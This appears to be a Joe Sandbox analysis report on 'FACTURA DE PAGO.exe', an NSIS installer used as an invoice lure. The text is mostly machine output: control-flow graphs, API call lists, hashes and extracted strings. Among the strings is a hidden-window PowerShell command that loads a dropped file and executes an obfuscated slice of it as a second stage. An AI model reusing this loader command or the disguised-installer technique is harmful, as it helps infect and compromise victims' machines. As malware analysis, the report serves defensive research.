                                                                                        • Opcode ID: 2b7e5661b8b3b760765e09419aafe74f52747e63502cbb40739d7b63bde2251d
                                                                                        • Instruction ID: d14c28ea715dd5a13497ef66355ac6b33f8f035006b682f92d24d725560d25e8
                                                                                        • Opcode Fuzzy Hash: 2b7e5661b8b3b760765e09419aafe74f52747e63502cbb40739d7b63bde2251d
                                                                                        • Instruction Fuzzy Hash: 0D51CF30800A44AADF21AB258C85BBF7AB8DF92754F54447BF404761D2D73C8982EE6E
                                                                                        APIs
                                                                                        • FindFirstFileA.KERNELBASE(74DF3410,0042B0B8,0042AC70,004058D2,0042AC70,0042AC70,00000000,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 0040603E
                                                                                        • FindClose.KERNEL32(00000000), ref: 0040604A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileFirst
                                                                                        • String ID:
                                                                                        • API String ID: 2295610775-0
                                                                                        • Opcode ID: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                                        • Instruction ID: 8bfbb141000912a81af5c8de5ce039a851029b32224eb031c3a4159cf0b452c4
                                                                                        • Opcode Fuzzy Hash: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                                        • Instruction Fuzzy Hash: 11D0123195D1205BC31167387D0C88B7B599B163317518A33B56AF12F0C7349C6686EE

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 250 403a41-403a53 251 403b94-403ba3 250->251 252 403a59-403a5f 250->252 254 403bf2-403c07 251->254 255 403ba5-403bed GetDlgItem * 2 call 403f14 SetClassLongA call 40140b 251->255 252->251 253 403a65-403a6e 252->253 256 403a70-403a7d SetWindowPos 253->256 257 403a83-403a86 253->257 259 403c47-403c4c call 403f60 254->259 260 403c09-403c0c 254->260 255->254 256->257 262 403aa0-403aa6 257->262 263 403a88-403a9a ShowWindow 257->263 267 403c51-403c6c 259->267 265 403c0e-403c19 call 401389 260->265 266 403c3f-403c41 260->266 268 403ac2-403ac5 262->268 269 403aa8-403abd DestroyWindow 262->269 263->262 265->266 287 403c1b-403c3a SendMessageA 265->287 266->259 272 403ee1 266->272 273 403c75-403c7b 267->273 274 403c6e-403c70 call 40140b 267->274 278 403ac7-403ad3 SetWindowLongA 268->278 279 403ad8-403ade 268->279 276 403ebe-403ec4 269->276 275 403ee3-403eea 272->275 283 403c81-403c8c 273->283 284 403e9f-403eb8 DestroyWindow EndDialog 273->284 274->273 276->272 281 403ec6-403ecc 276->281 278->275 285 403b81-403b8f call 403f7b 279->285 286 403ae4-403af5 GetDlgItem 279->286 281->272 289 403ece-403ed7 ShowWindow 281->289 283->284 290 403c92-403cdf call 405d51 call 403f14 * 3 GetDlgItem 283->290 284->276 285->275 291 403b14-403b17 286->291 292 403af7-403b0e SendMessageA IsWindowEnabled 286->292 287->275 289->272 320 403ce1-403ce6 290->320 321 403ce9-403d25 ShowWindow KiUserCallbackDispatcher call 403f36 EnableWindow 290->321 295 403b19-403b1a 291->295 296 403b1c-403b1f 291->296 292->272 292->291 298 403b4a-403b4f call 403eed 295->298 299 403b21-403b27 296->299 300 403b2d-403b32 296->300 298->285 301 403b68-403b7b SendMessageA 299->301 302 403b29-403b2b 299->302 300->301 303 403b34-403b3a 300->303 301->285 302->298 306 403b51-403b5a call 40140b 303->306 307 403b3c-403b42 call 40140b 303->307 306->285 317 403b5c-403b66 306->317 316 403b48 307->316 316->298 317->316 320->321 324 403d27-403d28 321->324 325 403d2a 321->325 326 403d2c-403d5a GetSystemMenu EnableMenuItem SendMessageA 324->326 325->326 327 403d5c-403d6d SendMessageA 326->327 328 403d6f 326->328 329 403d75-403dae call 403f49 call 405d2f lstrlenA call 405d51 SetWindowTextA call 401389 327->329 328->329 329->267 338 403db4-403db6 329->338 338->267 339 403dbc-403dc0 338->339 340 403dc2-403dc8 339->340 341 403ddf-403df3 DestroyWindow 339->341 340->272 342 403dce-403dd4 340->342 341->276 343 403df9-403e26 CreateDialogParamA 341->343 342->267 344 403dda 342->344 343->276 345 403e2c-403e83 call 403f14 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 343->345 344->272 345->272 350 403e85-403e98 ShowWindow call 403f60 345->350 352 403e9d 350->352 352->276
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
                                                                                        • ShowWindow.USER32(?), ref: 00403A9A
                                                                                        • DestroyWindow.USER32 ref: 00403AAE
                                                                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403ACA
                                                                                        • GetDlgItem.USER32(?,?), ref: 00403AEB
                                                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403B06
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00403BB4
                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403BBE
                                                                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403BD8
                                                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C29
                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00403CCF
                                                                                        • ShowWindow.USER32(00000000,?), ref: 00403CF0
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D02
                                                                                        • EnableWindow.USER32(?,?), ref: 00403D1D
                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D33
                                                                                        • EnableMenuItem.USER32(00000000), ref: 00403D3A
                                                                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D52
                                                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
                                                                                        • lstrlenA.KERNEL32(00429868,?,00429868,Trehagen Setup), ref: 00403D8E
                                                                                        • SetWindowTextA.USER32(?,00429868), ref: 00403D9D
                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00403ED1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                        • String ID: Trehagen Setup
                                                                                        • API String ID: 3282139019-262474160
                                                                                        • Opcode ID: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                                                        • Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
                                                                                        • Opcode Fuzzy Hash: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                                                        • Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 353 4036af-4036c7 call 4060c8 356 4036c9-4036d9 call 405c8d 353->356 357 4036db-40370c call 405c16 353->357 365 40372f-403758 call 403974 call 40588f 356->365 361 403724-40372a lstrcatA 357->361 362 40370e-40371f call 405c16 357->362 361->365 362->361 371 40375e-403763 365->371 372 4037df-4037e7 call 40588f 365->372 371->372 373 403765-403789 call 405c16 371->373 378 4037f5-40381a LoadImageA 372->378 379 4037e9-4037f0 call 405d51 372->379 373->372 383 40378b-40378d 373->383 381 40389b-4038a3 call 40140b 378->381 382 40381c-40384c RegisterClassA 378->382 379->378 396 4038a5-4038a8 381->396 397 4038ad-4038b8 call 403974 381->397 384 403852-403896 SystemParametersInfoA CreateWindowExA 382->384 385 40396a 382->385 387 40379e-4037aa lstrlenA 383->387 388 40378f-40379c call 4057cc 383->388 384->381 390 40396c-403973 385->390 391 4037d2-4037da call 4057a1 call 405d2f 387->391 392 4037ac-4037ba lstrcmpiA 387->392 388->387 391->372 392->391 395 4037bc-4037c6 GetFileAttributesA 392->395 399 4037c8-4037ca 395->399 400 4037cc-4037cd call 4057e8 395->400 396->390 406 403941-403949 call 40501a 397->406 407 4038be-4038d8 ShowWindow call 40605a 397->407 399->391 399->400 400->391 412 403963-403965 call 40140b 406->412 413 40394b-403951 406->413 414 4038e4-4038f6 GetClassInfoA 407->414 415 4038da-4038df call 40605a 407->415 412->385 413->396 418 403957-40395e call 40140b 413->418 416 4038f8-403908 GetClassInfoA RegisterClassA 414->416 417 40390e-403931 DialogBoxParamA call 40140b 414->417 415->414 416->417 423 403936-40393f call 4035ff 417->423 418->396 423->390
                                                                                        APIs
                                                                                          • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                          • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                        • lstrcatA.KERNEL32(1033,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA DE PAGO.exe",00000000), ref: 0040372A
                                                                                        • lstrlenA.KERNEL32(Space required: ,?,?,?,Space required: ,00000000,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,1033,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,74DF3410), ref: 0040379F
                                                                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 004037B2
                                                                                        • GetFileAttributesA.KERNEL32(Space required: ), ref: 004037BD
                                                                                        • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian), ref: 00403806
                                                                                          • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                                                        • RegisterClassA.USER32(0042DBA0), ref: 00403843
                                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
                                                                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403890
                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 004038C6
                                                                                        • GetClassInfoA.USER32(00000000,RichEdit20A,0042DBA0), ref: 004038F2
                                                                                        • GetClassInfoA.USER32(00000000,RichEdit,0042DBA0), ref: 004038FF
                                                                                        • RegisterClassA.USER32(0042DBA0), ref: 00403908
                                                                                        • DialogBoxParamA.USER32(?,00000000,00403A41,00000000), ref: 00403927
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                        • String ID: "C:\Users\user\Desktop\FACTURA DE PAGO.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Space required: $_Nb
                                                                                        • API String ID: 1975747703-1008607814
                                                                                        • Opcode ID: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
                                                                                        • Instruction ID: 60e5f6254d87716c4f77e59e0de616dae33e132719ef70849b8472436850552a
                                                                                        • Opcode Fuzzy Hash: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
                                                                                        • Instruction Fuzzy Hash: 4161E6B07442006EE620BF269C85F373EACEB45749F50443FF945B62E2C67CAD429A2D

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 427 402c66-402cb4 GetTickCount GetModuleFileNameA call 4059a2 430 402cc0-402cee call 405d2f call 4057e8 call 405d2f GetFileSize 427->430 431 402cb6-402cbb 427->431 439 402cf4 430->439 440 402ddb-402de9 call 402c02 430->440 432 402e98-402e9c 431->432 441 402cf9-402d10 439->441 446 402deb-402dee 440->446 447 402e3e-402e43 440->447 444 402d12 441->444 445 402d14-402d1d call 4030b1 441->445 444->445 453 402d23-402d2a 445->453 454 402e45-402e4d call 402c02 445->454 449 402df0-402e08 call 4030c7 call 4030b1 446->449 450 402e12-402e3c GlobalAlloc call 4030c7 call 402e9f 446->450 447->432 449->447 473 402e0a-402e10 449->473 450->447 478 402e4f-402e60 450->478 457 402da6-402daa 453->457 458 402d2c-402d40 call 40595d 453->458 454->447 463 402db4-402dba 457->463 464 402dac-402db3 call 402c02 457->464 458->463 476 402d42-402d49 458->476 469 402dc9-402dd3 463->469 470 402dbc-402dc6 call 40613d 463->470 464->463 469->441 477 402dd9 469->477 470->469 473->447 473->450 476->463 482 402d4b-402d52 476->482 477->440 479 402e62 478->479 480 402e68-402e6d 478->480 479->480 483 402e6e-402e74 480->483 482->463 484 402d54-402d5b 482->484 483->483 485 402e76-402e91 SetFilePointer call 40595d 483->485 484->463 486 402d5d-402d64 484->486 490 402e96 485->490 486->463 488 402d66-402d86 486->488 488->447 489 402d8c-402d90 488->489 491 402d92-402d96 489->491 492 402d98-402da0 489->492 490->432 491->477 491->492 492->463 493 402da2-402da4 492->493 493->463
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00402C77
                                                                                        • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\FACTURA DE PAGO.exe,00000400), ref: 00402C93
                                                                                          • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\FACTURA DE PAGO.exe,80000000,00000003), ref: 004059A6
                                                                                          • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURA DE PAGO.exe,C:\Users\user\Desktop\FACTURA DE PAGO.exe,80000000,00000003), ref: 00402CDF
                                                                                        Strings
                                                                                        • soft, xrefs: 00402D54
                                                                                        • Inst, xrefs: 00402D4B
                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                                                        • Null, xrefs: 00402D5D
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
                                                                                        • C:\Users\user\Desktop\FACTURA DE PAGO.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                                                                        • C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
                                                                                        • Error launching installer, xrefs: 00402CB6
                                                                                        • "C:\Users\user\Desktop\FACTURA DE PAGO.exe", xrefs: 00402C66
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                        • String ID: "C:\Users\user\Desktop\FACTURA DE PAGO.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURA DE PAGO.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                        • API String ID: 4283519449-1813466821
                                                                                        • Opcode ID: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
                                                                                        • Instruction ID: 2dd8a40a4a6da4a25a7ff80ffc2ca296f3ca1cc65932c4217ff60142993c7b59
                                                                                        • Opcode Fuzzy Hash: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
                                                                                        • Instruction Fuzzy Hash: 9651F771940214ABDF20AF65DE89B9E7AA8EF04714F54803BF504B72D2C7BC9D418BAD

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 625 401751-401774 call 402a3a call 40580e 630 401776-40177c call 405d2f 625->630 631 40177e-401790 call 405d2f call 4057a1 lstrcatA 625->631 637 401795-40179b call 405f9a 630->637 631->637 641 4017a0-4017a4 637->641 642 4017a6-4017b0 call 406033 641->642 643 4017d7-4017da 641->643 651 4017c2-4017d4 642->651 652 4017b2-4017c0 CompareFileTime 642->652 645 4017e2-4017fe call 4059a2 643->645 646 4017dc-4017dd call 40597d 643->646 653 401800-401803 645->653 654 401876-40189f call 404f48 call 402e9f 645->654 646->645 651->643 652->651 655 401805-401847 call 405d2f * 2 call 405d51 call 405d2f call 405525 653->655 656 401858-401862 call 404f48 653->656 668 4018a1-4018a5 654->668 669 4018a7-4018b3 SetFileTime 654->669 655->641 689 40184d-40184e 655->689 666 40186b-401871 656->666 670 4028d8 666->670 668->669 672 4018b9-4018c4 CloseHandle 668->672 669->672 674 4028da-4028de 670->674 675 4018ca-4018cd 672->675 676 4028cf-4028d2 672->676 678 4018e2-4018e5 call 405d51 675->678 679 4018cf-4018e0 call 405d51 lstrcatA 675->679 676->670 684 4018ea-402273 call 405525 678->684 679->684 684->674 684->676 689->666 691 401850-401851 689->691 691->656
                                                                                        APIs
                                                                                        • lstrcatA.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)",C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna,00000000,00000000,00000031), ref: 00401790
                                                                                        • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)","powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)",00000000,00000000,"powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)",C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna,00000000,00000000,00000031), ref: 004017BA
                                                                                          • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Trehagen Setup,NSIS Error), ref: 00405D3C
                                                                                          • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                          • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                          • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,74DF23A0), ref: 00404FA4
                                                                                          • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                                          • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                          • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                          • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                        • String ID: "powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)"$Arabisation\argumenta\dekaderne$C:\Users\user\AppData\Local\Temp\Vedlgges.Fam$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna
                                                                                        • API String ID: 1941528284-2025177743
                                                                                        • Opcode ID: 4f9644c0113f451ee2cb14cf97c87bd5b67e16b7d88c3abb121216c9f25fe8f5
                                                                                        • Instruction ID: 9fffb686f64fba45267de9fcbed8a5438fb589d34f2a074259106400a528bed4
                                                                                        • Opcode Fuzzy Hash: 4f9644c0113f451ee2cb14cf97c87bd5b67e16b7d88c3abb121216c9f25fe8f5
                                                                                        • Instruction Fuzzy Hash: 1041B831900519BBDF107BA5DC85EAF3679DF45368B60863BF121F11E1D63C8A418A6D

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 692 402e9f-402eb3 693 402eb5 692->693 694 402ebc-402ec5 692->694 693->694 695 402ec7 694->695 696 402ece-402ed3 694->696 695->696 697 402ee3-402ef0 call 4030b1 696->697 698 402ed5-402ede call 4030c7 696->698 702 402ef6-402efa 697->702 703 40309f 697->703 698->697 704 402f00-402f49 GetTickCount 702->704 705 40304a-40304c 702->705 706 4030a1-4030a2 703->706 709 4030a7 704->709 710 402f4f-402f57 704->710 707 40308c-40308f 705->707 708 40304e-403051 705->708 711 4030aa-4030ae 706->711 712 403091 707->712 713 403094-40309d call 4030b1 707->713 708->709 714 403053 708->714 709->711 715 402f59 710->715 716 402f5c-402f6a call 4030b1 710->716 712->713 713->703 725 4030a4 713->725 719 403056-40305c 714->719 715->716 716->703 724 402f70-402f79 716->724 722 403060-40306e call 4030b1 719->722 723 40305e 719->723 722->703 729 403070-40307c call 405a49 722->729 723->722 728 402f7f-402f9f call 4061ab 724->728 725->709 734 403042-403044 728->734 735 402fa5-402fb8 GetTickCount 728->735 736 403046-403048 729->736 737 40307e-403088 729->737 734->706 738 402fba-402fc2 735->738 739 402ffd-402fff 735->739 736->706 737->719 740 40308a 737->740 741 402fc4-402fc8 738->741 742 402fca-402ffa MulDiv wsprintfA call 404f48 738->742 743 403001-403005 739->743 744 403036-40303a 739->744 740->709 741->739 741->742 742->739 747 403007-40300e call 405a49 743->747 748 40301c-403027 743->748 744->710 745 403040 744->745 745->709 752 403013-403015 747->752 749 40302a-40302e 748->749 749->728 753 403034 749->753 752->736 754 403017-40301a 752->754 753->709 754->749
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
